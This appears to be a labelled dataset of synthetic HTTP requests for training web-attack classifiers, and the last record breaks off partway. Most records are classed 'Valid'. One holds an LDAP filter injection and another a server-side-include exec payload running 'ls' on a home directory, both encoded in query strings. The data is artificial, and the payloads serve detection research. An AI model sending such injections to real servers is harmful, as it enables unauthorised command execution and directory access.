UA-Pixels: 796x812
Via: HTTP/4.5 www.aw0e.html, HTTP/7.7 www.eerowe.shtml:8, 8.4 218.78.172.163
Transfer-Encoding: gzip
Upgrade: Anim/9.2, 4ebtk/6.4
Warning: 925 www.t1tEewa.css "iYe7tpBtm7wyjraztas" 
X-Forwarded-For: 252.218.6.87
X-Serial-Number: 65430
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 3234
Start - Id: 24198
class: Valid
GET /oo3usd/_ZufRlib9CRU6zreplaceh/dsDMsYL71/6TK1/7eioianpntwasp/sN2kI/az0YXz25Gtacub/asei3heyeo/kyM9nS3cO-GG.msf?almA7lMultle=5 HTTP/1.1
Host: www.otoeemewtn.ch:4
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: deflate;q=0.9, compress, gzip, deflate, deflate
Accept-Language: nd6ia-lqa;q=0.7
Cache-Control: max-stale
Client-ip: 65.205.45.106
Cookie: z62orAuE=j42ae;tohiiugmE=878795
Cookie2: $Version="99"
Date: Tue, 08 Feb 05 06:23:25 GMT
ETag: W/"UNL_9wgS_@wWqWN"
Expect: igctisrn=i5em
From: vktxen@eejuti.biz
If-Modified-Since: Mon, 20 Mar 06 12:37:11 UTC
If-Unmodified-Since: Thu, 12 Feb 04 10:02:27 CET
If-Match: *
If-None-Match: *
If-Range: Sun, 24 Sep 06 11:58:59 CET
Max-Forwards: 7
MIME-Version: 5.0
Pragma: no-cache
Proxy-Authorization: Iccdm brwetH=oa0t
Authorization: Digest nc=E7F8cB3A
Range: 402-8445,86978-05
Referer: /t5il/jrnohcv/ouadenre/sornsio/a5Owums7.bin
TE: chunked;q=0.9,trailers,trailers
Trailer: Max-Forwards
User-Agent: mguna (aLa7Tx8_; yn-NOmvy; cSi7yriOE)
UA-CPU: 68000
UA-Disp: 7755,8327,8
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 146x610
Via: FTP/0.0 101.162.88.118, FTP/0.2 142.39.65.104:012
Transfer-Encoding: identity
Upgrade: ees/5.3, ellt4t/5.4, hudaht/4.5, eEt/9.9, faaa/7.5
Warning: 155 147.225.115.94 "lnnt" 
X-Forwarded-For: 254.110.118.39
X-Serial-Number: 053808494
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 24198
Start - Id: 38571
class: LdapInjection
GET /e6ckqM/mh10/yswiazwDac/nUsf1eyaomeQ/iR/lt/uAtDdiv6VXg2z/kiX.2@eIcVM/ers8isvhirbrobormI/mm6gf0SpF_XE..wbhqk/tit1s2DusP.VT.i/1sejrlsteoingB5eo6.shtml?epIotonveoTnlo=272&06=xix+cei&8JXU-Rb.deleteiWZ=jueMa3aj&enugcfrc19Hneo=Zl&t6s=925%29%28%26%28objectClass%3Dxcw%29%28%7C%28sn++%3D++con%29%28cn%3Dlde++J*%29%29 HTTP/1.0
Host: www.gxdse.uk
Connection: close
Accept: */*
Accept-Charset: *;q=0.3
Accept-Encoding: *;q=0.9
Accept-Language: *
Cache-Control: no-transform
Client-ip: 231.216.109.79
Cookie: hZ8xe=thLM;mhfeThwaf=wdivgrrcpG;g6xycsdcplsaa=0485984;esscacue=oyLIdOt;udnseJzn4Isteho=1hAinsertE ;oCMo7VrJVhEN=nNfjl0
Cookie2: $Version="987"
Date: Sat, 20 Mar 10 15:56:14 GMT
ETag: "Xn6bLNl6HcqYn2A"
Expect: UpT3s
From: rdtaepw@enuD8ssxt.biz
If-Modified-Since: Thu, 08 Sep 05 08:25:03 GMT
If-Unmodified-Since: Sun, 18 Jan 09 24:02:00 GMT
If-Match: *
If-None-Match: *
If-Range: "i77PH7Bjn25NOQMj"
Max-Forwards: 7861
MIME-Version: 6.9
Pragma: no-cache
Proxy-Authorization: Basic bGVhY286c3RvcnNz
Authorization: te0cr rhsa=daNhaixq
Range: -5
Referer: http://www.nern.gov/frItsa7/erbg1/aArmsusi/1b2mnsml.conf
TE: trailers,trailers,gzip
Trailer: If-Range
User-Agent: jaeqa (rKLR0cX; nx4.sdn; u1ENpx; yplPlbzk; 31Qt7Y)
UA-CPU: PowerPC
UA-Disp: 9162,3647,32
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 233x5921
Via: 8.2 77.139.118.111
Transfer-Encoding: compress
Upgrade: iSr/6.2
Warning: 149 www.memO4ih.js "gsEeeekriesa" "Mon, 30 Nov 09 07:31:03 GMT"
X-Forwarded-For: 157.225.217.71
X-Serial-Number: 0288802054604644545
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38571
Start - Id: 7671
class: Valid
POST /sp7Wxrfjoi4.@S/wtgdow/nsehotE3sdok7VghsaN/rsAfpollluT9desWul9/uP@JGGt4O/n4/u5pl2zmEnDM7feHZ/nnewrnosianppselsr/hz9VTvnLfWTzflQ6t@/4PQGK..mspx? HTTP/1.0
Content-Length: 74
Content-Language: qaeext,d,Fhe
Content-Encoding: deflate
Content-Location: http://esNes.uk/tlxtr8w/Cr6enk/l1scer/7o4vce3.mp3
Content-MD5: TW9lbHdHYmxsbGFpdHhuMQ==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 16 Jul 04 06:35:24 GMT
Last-Modified: Mon, 30 Jan 06 15:36:52 CET
Host: www.tnnecxn.biz
Connection: rntt7oa
Accept: video/mpeg, application/*, application/x-tar
Accept-Charset: windows-1250;q=0.8
Accept-Encoding: 
Accept-Language: ikds-mttEl, stt-w, ths9-m6yaie;q=0.3
Cache-Control: nu='c9hpei'
Client-ip: 41.206.202.253
Cookie: za8Gmegsu2=aez
Cookie2: $Version="606"
Date: Sat, 25 Aug 07 24:10:40 CET
ETag: W/"5IE9rBjdiYylKEB"
Expect: 100-continue
From: hene@2u8tDiet.com
If-Modified-Since: Wed, 07 Apr 04 13:59:32 GMT
If-Unmodified-Since: Tue, 20 May 08 08:23:58 GMT
If-Match: "eVdA9nRfKUt_nT4L_f"
If-None-Match: "rSP6pjI-OU2CAqGJN"
If-Range: *
Max-Forwards: 7451
MIME-Version: 4.9
Pragma: rybVeDse=d
Proxy-Authorization: uocnn dT6my=esqesaq
Authorization: Basic bmlnZXI6YXhnaXU=
Range: 3057-62032,67283-,-7611
Referer: /onjsde/ssT95xh/tep0eea/a1eS/orewtp.msf
TE: deflate
Trailer: Accept
User-Agent: 1ieRTne
UA-CPU: Sparc
UA-Disp: 958,2285,8
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 0413x678
Via: FTP/6.8 201.144.76.35, h7dtO/6.3 1.89.189.15, 6.0 www.amiLp.png
Transfer-Encoding: compress
Upgrade: reasrf/4.1
Warning: 953 www.sgtzoeOm.png:0 "musiwDeiogabd1ld" "Fri, 16 Jan 04 11:28:31 GMT"
X-Forwarded-For: 116.49.9.190
X-Serial-Number: 117057517
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

donrulttioinea=iIhyiihttpsnxib&QrgfPW5kpcmH=73059018&ydtd=54007&etR=128640

End - Id: 7671
Start - Id: 10511
class: Valid
GET /aeSNsT/ey_.d0CNIn9Uu-Tm5/r8Z2MxxJdI_./mr_AKmUSfA_GP/yoii/e3SmB.aspx?nis0o=0&patdhhti3Gnfeb=qss%24%3E HTTP/1.0
Host: 219.37.112.110
Connection: keep-alive
Accept: audio/basic, video/*, audio/*;q=0.8
Accept-Charset: *
Accept-Encoding: gzip, gzip
Accept-Language: *;q=0.7
Cache-Control: ttl3='wsD8z'
Client-ip: 221.206.174.173
Cookie: e5eqoecsJn=cut83etceenNe;smo=d;ott5arishse=sn%ug;UlvhttpslXh.T=hrl$)6>o6
Cookie2: $Version="136"
Date: Thu, 30 Aug 07 21:53:31 GMT
ETag: "2VNo8RB5OZi0jqIi"
Expect: 100-continue
From: r1ahidt@tnaomtA.it
If-Modified-Since: Thu, 25 Mar 10 02:38:15 UTC
If-Unmodified-Since: Wed, 22 Oct 08 01:41:34 UTC
If-Match: "VFyPneT-OOzbhuPkUxKM"
If-None-Match: "JcfaQiuJhyZtnWcj"
If-Range: *
Max-Forwards: 5751
MIME-Version: 2.1
Pragma: no-cache
Proxy-Authorization: Basic ZG1pcVNkcjM6aGFucng=
Authorization: Basic ZnNhY0VkbUM6cjZoaHNh
Range: -11352
Referer: /uanae/oltr/rvetn4n/rrljn/eest0.php4
TE: trailers,trailers,deflate
Trailer: Authorization
User-Agent: acso6zCd/0.3
UA-CPU: StrongARM
UA-Disp: 710,2489,32
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 4657x757
Via: 3.3 74.191.44.96, 8.6 212.17.106.245
Transfer-Encoding: deflate
Upgrade: 6Elor/3.8
Warning: 876 92.101.176.229 "roortcwwki3otne" 
X-Forwarded-For: 161.230.166.5
X-Serial-Number: 98147817279
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 10511
Start - Id: 24703
class: Valid
GET /bQQ.cfm?uchoni=48&NtelnetwtzOmailR=81604835 HTTP/1.0
Host: www.Orvceosait.st:80
Connection: close
Accept: */*
Accept-Charset: iso-8859-7;q=0.6, iso-2022-kr, windows-1257;q=0.6, shift_jis, isiri-3342;q=0.0
Accept-Encoding: *
Accept-Language: HtYieas-segai;q=0.4
Cache-Control: no-store
Client-ip: 134.9.21.40
Cookie: cierCtcsSrhe=sidghd4toaY4trtmlf;ewpnt4ot7woo=1;onaiid=thaRoro6hmfntk;legnnf=fmo9urWPCAvi
Cookie2: $Version="077"
Date: Mon, 05 Jan 04 17:33:22 UTC
ETag: "t@IVI2TA3htbcl8FxPh"
Expect: 100-continue
From: e0as@ptste.uk
If-Modified-Since: Thu, 17 Aug 06 23:22:58 CET
If-Unmodified-Since: Mon, 16 Jan 06 23:05:34 CET
If-Match: "Xb-OSa4csVhv5.5"
If-None-Match: *
If-Range: Fri, 09 Jul 04 14:22:43 CET
Max-Forwards: 786
MIME-Version: 6.5
Pragma: no-cache
Proxy-Authorization: NTLM YWJvdG5vbHJzdHNlbXJvZmlldTJkT2VnYWRSc1B5bzdlaWJodGNy
Authorization: NTLM aEh0dThjeWhyU3N0ZWt0cmVkN25vaHlxcnNtQW80eHVyb25zVG9uZWJjRQ==
Range: 1773-,147343-45947,-7279
Referer: /toCyt4/sd6ion.php
TE: gzip
Trailer: Date
User-Agent: Mozilla/6.6 (Windows; U; WinNT 9.9; mg-5l; rv:9.8.7) Gecko/20837792
UA-CPU: PowerPC
UA-Disp: 9340,8339,32
UA-OS: Win95
UA-Color: color8
UA-Pixels: 189x0213
Via: HTTP/5.0 www.ayncp.png, 6.5 248.169.75.45, rmweu/2.4 www.diaatn.png:29
Transfer-Encoding: compress
Upgrade: noohwb/5.0
Warning: 540 44.10.123.96:4 "peien0ehi" 
X-Forwarded-For: 30.59.4.192
X-Serial-Number: 7759023411175915
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 24703
Start - Id: 901
class: Valid
GET /lMDkX5m@F/dBjYef9DS7kDTCu/t0jiBC@jG.swf?wiRR@RK=5001&_0Hqpr.BbPN=PNhaeIunQl3l6ru&ntretC=rsbetweenservicese&tcope=nmr&oeA9zdgEUaerQjr=e-1P9&itngov=o%7Ciapjoeinsertn4e2eqiframeci HTTP/1.0
Host: www.hfAeoo2ao.cz
Connection: close
Accept: application/*, audio/*
Accept-Charset: x-mac-ce, shift_jis;q=0.7, isiri-3342;q=0.4
Accept-Encoding: *
Accept-Language: 0-c;q=0.8, r-t;q=0.2, ne54rh-an;q=0.8
Cache-Control: no-store
Client-ip: 171.41.47.153
Cookie: exeyQStaUoe=ezJH;QVac-UkA=77546864;0ToCobjectoW=eCiT
Cookie2: $Version="327"
Date: Wed, 20 Oct 04 11:58:47 CET
ETag: "33HcNbBNC1HdtlHTdYe"
Expect: 100-continue
From: Ou2tor@taoe.fr
If-Modified-Since: Tue, 12 Jul 05 03:08:30 UTC
If-Unmodified-Since: Thu, 28 Aug 08 11:49:41 GMT
If-Match: *
If-None-Match: "xPvElBril@aIYUP"
If-Range: *
Max-Forwards: 16
MIME-Version: 0.4
Pragma: 9Ahet=enu
Proxy-Authorization: Digest uri=http://apeo.fr/nenaohpr/utnBni/Eeor/utbwemst.dll
Authorization: rtssj eoTayTz=teowho4
Range: 24-
Referer: /2nqhe.jpeg
TE: deflate,deflate;q=0.1
Trailer: If-None-Match
User-Agent: Mozilla/8.8 (Machintosh; U; PPC Mac OS X 0.6; e7-ht; rv:0.4.5) Gecko/45473907
UA-CPU: 68000
UA-Disp: 026,040,8
UA-OS: Win98
UA-Color: color32
UA-Pixels: 1573x8135
Via: FTP/4.5 www.ototz.tiff, 5.3 www.aieIeeer.png
Transfer-Encoding: tnaoii; ybio=Tde1
Upgrade: iehx1/0.3, ohanrn/8.7, 0ph/6.5, RaOe/2.8
Warning: 603 240.95.248.64 "moWglFxicahg4rn" 
X-Forwarded-For: 145.115.206.7
X-Serial-Number: 510626783025324042
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 901
Start - Id: 10062
class: Valid
GET /DOR29ftp/bh6sskeeewitzp/rRe_6JDT-xr/0knttco9nwsrns.jpg?htmuiu7enhs=0243&deEa1es=5144&iHlarogks=deoao+acceptnOneneautoexecn&cyn10aasynMdr=30 HTTP/1.0
Host: 200.26.52.2:62444
Connection: keep-alive
Accept: */*
Accept-Charset: iso-8859-9;q=0.1, x-mac-arabic;q=0.7, iso-8859-8
Accept-Encoding: 
Accept-Language: *;q=0.4
Cache-Control: min-fresh=7417
Client-ip: 62.38.172.190
Cookie: Chissh=a\iS
Cookie2: $Version="98"
Date: Mon, 25 Oct 04 12:02:31 UTC
ETag: W/"fZL-CgdQBuZcfNUqK"
Expect: hedstDad
From: aemYeste@u736nnw.biz
If-Modified-Since: Tue, 23 May 06 19:09:19 GMT
If-Unmodified-Since: Wed, 31 Mar 10 17:52:53 UTC
If-Match: *
If-None-Match: "YyHQl5JrekFeqsTi"
If-Range: "WMGaW1.3eD1X_PQZH3"
Max-Forwards: 01
MIME-Version: 2.9
Pragma: qryluj='urss'
Proxy-Authorization: s8uvfp astdo3=rgfps9
Authorization: Basic azEzaWg6c1lmNXg=
Range: 312215-014657
Referer: http://sltrf.st/1eta/obonute/wwdei3.gif
TE: trailers
Trailer: Host
User-Agent: Mozilla/5.7 (Windows; U; Win 9x 7.5; Oe-oe; rv:4.2.5) Gecko/09403361
UA-CPU: PowerPC
UA-Disp: 3720,8490,32
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 6453x8240
Via: HTTP/3.9 www.ptctnuan.js, hpRar/9.1 46.14.244.118
Transfer-Encoding: identity
Upgrade: tnEc/8.2, iai/8.8, eao/8.5
Warning: 334 201.54.73.174:7 "ostm1" 
X-Forwarded-For: 189.69.165.224
X-Serial-Number: 905480693565962672
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 10062
Start - Id: 40054
class: SSI
GET /oWejL2/e1AgucrlTbd1Neyuerto/mRdmzVg9binR23acceptj/Ce.bin?IGcC.Ibf0=uautoexecq&tdeueIrfouoelss=n+phpeh&brotrdonefIh2=9%3Aiehislga%3DiIhoynD&acn9IopenOOWiandR=7&en=294&rzK=+hdwp-7xmtsarhttp&pst=34854524&bZb2r=d%3Asydrk&h7no=ltRetaoiko-rll&rs3d=%3C%21--++%23exec+cmd%3D%22%2Fbin%2Fls+++-l++%2Fhome%2Fhnrtidh3ss%2F34but1l%22++--%3E&cKku.CX@1H=kierirrPos+n HTTP/1.0
Host: 181.235.112.237:78
Connection: keep-alive
Accept: */*;q=0.8
Accept-Charset: *;q=0.1
Accept-Encoding: 
Accept-Language: lWe5wrN-tvehl5ok;q=0.7, yow-5urndiO, etob-2htfohxb;q=0.8, 5rt-4I;q=0.4
Cache-Control: t='Rdatebrd'
Client-ip: 9.121.250.171
Cookie: Ekf5oenm=ijnrPaoi6;tetgrwnr22=xlE=yohttpseeglteng>otaccept;hhsedepdnarFe=)b autoexece;o7=1053;t0vd=08209722
Cookie2: $Version="977"
Date: Tue, 25 Oct 05 15:32:31 GMT
ETag: "E13puIippJH_MZisUTlR"
Expect: 100-continue
From: eto0Hh@8untinHaB.de
If-Modified-Since: Sat, 06 Mar 10 15:33:13 UTC
If-Unmodified-Since: Sun, 24 Feb 08 02:23:35 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 196
MIME-Version: 3.6
Pragma: no-cache
Proxy-Authorization: Basic bWVlb206aXVvdA==
Authorization: NTLM ZGhzaHRkZDJwd3NhaWV0cGRvNm9nT2loblVaZUVvc2FvdmZ1dG9IZQ==
Range: 271-,17364-
Referer: http://le8t.ch/ifierg/aeri8fI.sh
TE: gzip;q=0.4,deflate;q=0.1
Trailer: User-Agent
User-Agent: WamrmrTI80tnaayeDoDe
UA-CPU: PowerPC
UA-Disp: 098,0653,8
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 8002x1361
Via: 2.1 173.238.200.153, 4.2 225.183.93.157, 4.8 www.3non7hcn.gif:42
Transfer-Encoding: deflate
Upgrade: cGu/7.6
Warning: 301 www.aNxatsl.gif "mcn8ho5" "Mon, 26 Jan 09 23:46:07 CET"
X-Forwarded-For: 91.94.98.157
X-Serial-Number: 02001
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 40054
Start - Id: 18062
class: Valid
GET /imeec5h7ua/aYjj96mMfvmg/lSAxFjYwYXy4Xc/eU0S5xhTrZ9rD./t0HJ14VFlMF/57kH4dbDhY6GlvJP/ypeDettaeeinre7oeas/window.openLi/0n206vU5/oCNwindow.opensjJ/Enelosxp/C4iX.exe? HTTP/1.0
Host: 75.54.149.156
Connection: close
Accept: image/*, audio/basic;q=0.9
Accept-Charset: iso-8859-9;q=0.8, big5;q=0.5, iso-8859-2, iso-8859-3;q=0.0
Accept-Encoding: *;q=0.0
Accept-Language: *;q=0.3
Cache-Control: max-stale
Client-ip: 6.255.150.52
Cookie: to=sT2qPrF;dnnSnardLsnqt7t=HOoAophpobjectoxbsg@8ne ;eyhdg1Sqj9YxU=94073661
Cookie2: $Version="70"
Date: Wed, 29 Nov 06 05:14:14 GMT
ETag: "SiTkbb.5aR7i804En"
Expect: 100-continue
From: ubo9@noxriwRe.cz
If-Modified-Since: Thu, 25 Dec 08 11:19:12 UTC
If-Unmodified-Since: Fri, 28 Sep 07 23:49:53 GMT
If-Match: "Neyg2-t0-.kHSuV21"
If-None-Match: "HSlgL3PtStfPBnt"
If-Range: "wme5B43QYs31S0-"
Max-Forwards: 68
MIME-Version: 3.6
Pragma: no-cache
Proxy-Authorization: nagit ilrhne=uTamR
Authorization: Basic N2hub3RPZjp5aTl4c2hv
Range: -498682,294755-,-12868
Referer: http://www.hbsrei.fr/reLH/ieya.mdb
TE: trailers,deflate;q=0.8,trailers
Trailer: If-Match
User-Agent: a17hne/1.2
UA-CPU: PowerPC
UA-Disp: 9424,5309,8
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 519x975
Via: 0.1 66.161.71.41, ikne/6.1 www.oNnT.png:3198
Transfer-Encoding: hpt5i
Upgrade: tdlvc/2.4, nwdaao/9.3
Warning: 781 78.175.59.108 "s0atoompRe" 
X-Forwarded-For: 169.12.78.179
X-Serial-Number: 507009022926065
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 18062
Start - Id: 1620
class: Valid
GET /SdarEtaeset83ibeAnl/r7@ObhO0f3.css?jorLjeodhooiSib=76&yd=41&zu=44119540&gmdgHly=tsbh&p77ivmiS=1&eETi9yop0twstsu=6298660864 HTTP/1.0
Host: 19.79.7.26
Connection: close
Accept: */*
Accept-Charset: iso-8859-9, iso-8859-4;q=0.5
Accept-Encoding: compress, gzip;q=0.0, gzip;q=0.4, deflate;q=0.6, deflate
Accept-Language: iiV-s, s-d6n5e;q=0.0
Cache-Control: no-transform
Client-ip: 145.27.235.103
Cookie: oszCrnTte=d20Obwf3w;3arih=n?ctelnetz;hntmoTm=1onn;tohho2ceo=R%
Cookie2: $Version="28"
Date: Thu, 08 Apr 04 11:32:35 UTC
ETag: "b-jC-mVfHYzvRSSCca"
Expect: i66Tr
From: S6tD@nser.com
If-Modified-Since: Tue, 13 Apr 04 05:26:33 CET
If-Unmodified-Since: Fri, 12 Oct 07 13:07:57 UTC
If-Match: *
If-None-Match: "dx6pClckYyEfO3a5RSW"
If-Range: "HWBxFNrBrMurE9G2"
Max-Forwards: 6374
MIME-Version: 7.4
Pragma: no-cache
Proxy-Authorization: Basic czlnaDplZXJhYg==
Authorization: Digest response="A8cde82e8bfCe4531Fcc3cD21Ee0e132"
Range: -60187,7-
Referer: http://seoOie.gov/OIETtvt.nsf
TE: chunked,chunked
Trailer: Accept-Charset
User-Agent: nhlashe7/9.3.5.8.5
UA-CPU: PowerPC
UA-OS: Win95
UA-Color: color16
UA-Pixels: 7605x6639
Via: 5.4 www.3J2eeai.shtml, FTP/8.5 www.wwultehO.css, fohese/0.8 www.ee6haaq.jpg:989
Transfer-Encoding: gzip
Upgrade: E9o/3.0, tlHeh/4.8, eie/1.1, ktbco/4.2
Warning: 478 www.2leHh0te.css:121 "aurisc" 
X-Forwarded-For: 219.253.153.237
X-Serial-Number: 951782278923
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 1620
Start - Id: 9981
class: Valid
GET /se/sCm@rGUBhOcbn8O.pb/iX3uzRvLV6FjI/erriliuN1ssarwee/ryMb9.T-xPxBQ/m6TBjP/Oerswvieil/LQ/AarnhtHs9nenu/esn5Eiytetaehoh.pl?bitd1=l%7C%5C&xnt=%2B1eogePl&noYR69=364059&lsnfaiiaia=47739997&81Bcopy=+sep%2B&ENinkapdmxtss=2864707&nnguegcass=67&7hnntgz2tidtE=mmK%40LEvlZ&drimei=44&Kfd0P=ailagrErtinwdqwhl HTTP/1.0
Host: www.snb5eat4.net
Connection: eia5
Accept: audio/*;q=0.3, application/postscript;q=0.4
Accept-Charset: *;q=0.7
Accept-Encoding: *;q=0.4
Accept-Language: tinbenh-Tt, hdrhe-Dgdot;q=0.7
Cache-Control: min-fresh=4496
Client-ip: 41.19.16.178
Cookie: nc6tEiiee=o1n;pg.pnCn2yAtD=3877;ssetrtnarsnsesr=c;natwSpMniegtle=atVaWc5tmngatbin;orheiJ=eRGbn;dot=emAkqagH68
Cookie2: $Version="685"
Date: Thu, 15 Apr 10 04:17:58 GMT
ETag: W/"ECe2WN4-zMn7Vbmt0Lnn"
Expect: eDunR6h=U9t0she;7i6orH
From: knmx@Elha8dsti.biz
If-Modified-Since: Sun, 14 May 06 15:49:57 CET
If-Unmodified-Since: Wed, 24 Feb 10 24:48:23 CET
If-Match: *
If-None-Match: "KGIhl_-vYW4FoRAuY1"
If-Range: Sat, 18 Nov 06 16:17:57 UTC
Max-Forwards: 7
MIME-Version: 2.8
Pragma: inmdosjo='lloooao'
Proxy-Authorization: adE2 tucxsisy=rg2o
Authorization: Basic aEVzQ25tZDpuaHlsdGlz
Range: -96
Referer: http://odTh06ee.fr/6Oooulsd/HczadhV.dll
TE: chunked;q=0.9
Trailer: User-Agent
User-Agent: Mozilla/3.8 (compatible; eue2; Win98; itpl)
UA-CPU: MIPS
UA-Disp: 0205,052,16
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 6267x971
Via: HTTP/3.6 www.lInankUy.jpg, eeidm/4.5 253.100.33.86, ihele5/8.9 www.es8tugiw.htm:189
Transfer-Encoding: o2f4o
Upgrade: b2bhql/3.8
Warning: 931 92.10.176.123 "7n9dapecdstr" 
X-Forwarded-For: 42.220.161.64
X-Serial-Number: 7198158285326670
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 9981
Start - Id: 20601
class: Valid
GET /imkiltirhlhdrtarc/iUB@n/aN/utaE/mDnxk_98Zn/JmW6ee@h/hi2/iituotdsoytciLsenoT/h4SFdU9znfPA/ipTnQkJP5A7SMjR1eIbb/1Ncv4_-iRAUaf.mdb?ey5Ykk88uwg=2995501270&rartr0ttrnnlpta=ebji%5Cenenh%5Bees&ei=usdrN5rsnEa&ifMalha=808&lTculezpRt=ee+qxee1eRmh&ftpih=o%27etNitiniframeo&eiqoaqr=r6Mx&71C.A=o0uteeT6hevbeoFq&eDa5ih=dTtaals%3Ce8h&owhpea=7450795&eCrefIcety=243836&12Cyrpe3a=090&nh5uHei=rmior HTTP/1.0
Host: www.amtktFcr.st:11
Connection: puvtmthb
Accept: */*
Accept-Charset: iso-8859-15;q=0.7, windows-1257;q=0.9, iso-10646-ucs-2;q=0.1, us-ascii, ks_c_5601-1987
Accept-Encoding: 
Accept-Language: *;q=0.9
Cache-Control: only-if-cached
Client-ip: 85.31.157.53
Cookie: fxns=);rApln=uTiwe r;Wob=4aoasiveafbes&w
Cookie2: $Version="989"
Date: Mon, 09 Feb 09 22:48:53 UTC
ETag: "AE0417QjoIDKTzg.9"
Expect: sIe9=qe5nheo
From: ts5bme9@rv7as.net
If-Modified-Since: Wed, 28 Apr 04 06:17:23 CET
If-Unmodified-Since: Mon, 02 Jun 08 23:18:17 UTC
If-Match: *
If-None-Match: *
If-Range: Wed, 06 May 09 18:20:34 CET
Max-Forwards: 08
MIME-Version: 4.6
Pragma: no-cache
Proxy-Authorization: Digest username="weion"
Authorization: Digest opaque="kazV"
Range: 8188-
Referer: http://www.linw.fr/meOsTyqE/of2ci/Jngrier/4saftg9q.mdb
TE: trailers,trailers,trailers
Trailer: Upgrade
User-Agent: Nrtlwamsdt (aPDCnT1F)
UA-CPU: StrongARM
UA-Disp: 6133,0939,32
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 9357x868
Via: 4.4 www.0letqta.jpeg
Transfer-Encoding: deflate
Upgrade: omkc/7.9, eioeh/7.8, uys/8.2, frL/0.6
Warning: 085 www.nNmehRA.gif "mrtsh7o" "Wed, 07 Feb 07 15:55:05 GMT"
X-Forwarded-For: 16.249.84.121
X-Serial-Number: 999844116491308
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 20601
Start - Id: 24435
class: Valid
GET /n_V/druh5yXtt/h0hknxnlL7i/lbN7./dtyiez/LKR/7@JD-_Zq7oLI/h6Ezeecrwaor6l3e/8pG@KceH2X/jqs.jpg?too3r=ooypv&5em68iNhcwTNS=%2F0&j9=s6wmiBoAA4Z&famr=unolb7i&Awn=60843&eei=21037309&nHirtaucinNlnvi=iNmtmcaa&2OslxFjsormser=954&inieye50wsgohr=n1yd7ei%2Fmjf&trdesuH3sdn=nweys&tewr9iyg=7783661&e1=%5Dsetyt%26Eojth&xylhuer=jaenSieNdouatdA&EqDdrcpDMTY7=u HTTP/1.0
Host: 171.180.4.208
Connection: t1ydEtDb
Accept: */*;q=0.8
Accept-Charset: windows-1251;q=0.0, iso-8859-9, iso-8859-5;q=0.8, iso-8859-3, us-ascii;q=0.1
Accept-Encoding: deflate;q=0.3, gzip, deflate, deflate
Accept-Language: a-ltsr;q=0.8, eoekyUli-puee;q=0.5, s5-lt, rmtbk-wEAu, amiaae-5c;q=0.0
Cache-Control: t=hmu
Client-ip: 118.147.21.138
Cookie: 1WRG5=4553273952;Neha=a0z.8BIs8gkz;hLaL=qlPIxpfR5lJ;oSY2vcmocha=tEekygtheeo8cTosn;gRrtp04etxhub=508024;cea9r6=ttb'nsefk
Cookie2: $Version="89"
Date: Mon, 06 Sep 04 06:54:45 GMT
ETag: W/"Eitq@5Y_rE3goJ8"
Expect: 100-continue
From: 1p31@tsn2hg.com
If-Modified-Since: Tue, 12 Sep 06 15:04:20 UTC
If-Unmodified-Since: Fri, 03 Dec 04 13:01:13 UTC
If-Match: "ypjy2h@XXz8LdCWjf_"
If-None-Match: "Sg4JKU6XLvzdbrp_Mq"
If-Range: Sat, 14 Jan 06 10:47:18 UTC
Max-Forwards: 1
MIME-Version: 8.8
Pragma: no-cache
Proxy-Authorization: trHksd ftbdaee=elEtN
Authorization: NTLM b2VJb2hldGQzdzlzbm5YZHRBdTNwTWVvdG9zVWhteWlu
Range: -78
Referer: http://www.oi8f.de/hshfahq/anbnu.mpeg
TE: gzip;q=0.6
Trailer: From
User-Agent: eGiZ_I2-B http://www.eo4xhitb.fr
UA-CPU: StrongARM
UA-Disp: 2319,894,8
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 257x1408
Via: 2.0 85.202.105.170, HTTP/7.8 www.Tsiert1.htm:0791
Transfer-Encoding: gzip
Upgrade: I3r8es/8.7
Warning: 384 232.82.13.199:64408 "wtsat5ea1fS" "Fri, 28 May 04 19:43:14 CET"
X-Forwarded-For: 186.89.49.199
X-Serial-Number: 782387
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 24435
Start - Id: 4420
class: Valid
POST /neogswhrelsgtHea/nry/eprl1eedojnuIgjwur/shutdownDfKHXechoNI/suEUtQLG43cKxVnzl0i/e7e@_4Z@U9Iy0pyOzpXm/uLFO/acJ5n/GfrlulvcrBq3ot/nXicjZdWoHmpPcCerUD/e9.jpg? HTTP/1.0
Content-Length: 234
Content-Language: feny,5aom,ycee
Content-Encoding: gzip
Content-Location: /o8pi8/rlJs/zoesal.nsf
Content-MD5: czRUZ2x0YWRvZWNzcGlkbg==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 01 Mar 05 08:41:20 CET
Last-Modified: Sat, 05 May 07 14:24:31 UTC
Host: 231.176.230.100
Connection: close
Accept: text/*;q=0.7, text/*
